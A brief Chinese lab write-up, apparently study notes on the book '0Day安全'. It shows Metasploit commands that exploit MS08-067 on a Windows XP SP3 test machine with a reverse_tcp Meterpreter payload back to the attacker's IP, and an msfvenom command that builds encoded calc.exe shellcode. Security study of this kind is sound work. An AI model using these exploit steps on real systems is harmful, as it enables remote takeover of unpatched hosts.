本文绝大多数内容来自于0Day安全这本书,因书本内容较为久远和本人水平有限,如存在错误的地方还望前辈指出。

image-20210520091443458

入侵Windows系统

书本种是利用CVE-2006-3439(KB921883)对目标Windows系统进行攻击。因为自己电脑上没有XPSP1的环境所以就选择MS-08-067作为本次实验的利用漏洞,目标主机系统为WindowsXP SP3。注意目标主机和攻击主机之间得相互可达(目标机关闭防火墙,双方可以Ping通)

//msf console
use windows/smb/ms08_067_netapi


//配置利用成功后返回的会话如何监听
set payload windows/meterpreter/reverse_tcp

//显示当前所选漏洞和 shellcode 需要配置的选项
show options
set rhost 目标IP
set lhost 攻击IP

exploit

image-20210520094519050

利用Msfvenom制作shellcode

详细的Msfvenom的使用方法可以看官方的使用wiki中文翻译

image-20210520100304211

//查看所用可用的payloads
msfvenom -l payloads

//生成弹出计算器的shellcode,-p选择payloads ,-e 选择编码器 ,-b shellcode不要出现哪些字符 ,-f 生成的shellcode的格式

msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -b '\x00' -f c

image-20210520101157454